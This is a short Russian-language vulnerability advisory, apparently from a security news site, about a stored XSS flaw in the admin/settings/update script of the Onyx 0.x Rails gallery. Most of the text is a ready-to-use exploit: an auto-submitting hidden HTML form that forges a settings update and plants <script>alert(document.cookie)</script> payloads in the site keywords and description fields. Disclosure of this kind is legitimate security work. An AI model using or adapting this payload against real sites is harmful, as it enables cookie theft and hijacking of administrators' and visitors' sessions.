Программа: Onyx 0.x

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему. Уязвимость существует из-за недостаточной обработки входных
данных сценарием admin/settings/update. Атакующий может выполнить произвольный
сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Эксплоит:

<form action="http://host/admin/settings/update" method="post" name="main"
>

<input type="hidden" name="setting[site_title]" value="My Onyx Gallery" />
<input type="hidden" name="setting[site_keywords]" value='Ruby on Rails Gallery"><script>alert(document.cookie)</script>'
/>
<input type="hidden" name="setting[site_description]" value='Onyx is an open
source free ruby on rails gallery"><script>alert(document.cookie)</script>' />
<input type="hidden" name="setting[welcome_title]" value="Welcome!" />
<input type="hidden" name="setting[welcome_message]" value="Welcome to my
gallery!" />
<input type="hidden" name="setting[uniform_width]" value="500" />
<input type="hidden" name="setting[uniform_height]" value="500" />
<input type="hidden" name="setting[thumbnail_width]" value="100" />
<input type="hidden" name="setting[thumbnail_height]" value="100" />
<input type="hidden" name="setting[dummy_watermark_enabled]" value="0" />
<input type="hidden" name="setting[tooltips_enabled]" value="1" />
<input type="hidden" name="setting[tooltip_width]" value="300" />
<input type="hidden" name="setting[maximum_uploadable_files]" value="10" />
<input type="hidden" name="commit" value="Update Settings" />

</form>
<script>
document.main.submit();
</script>

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии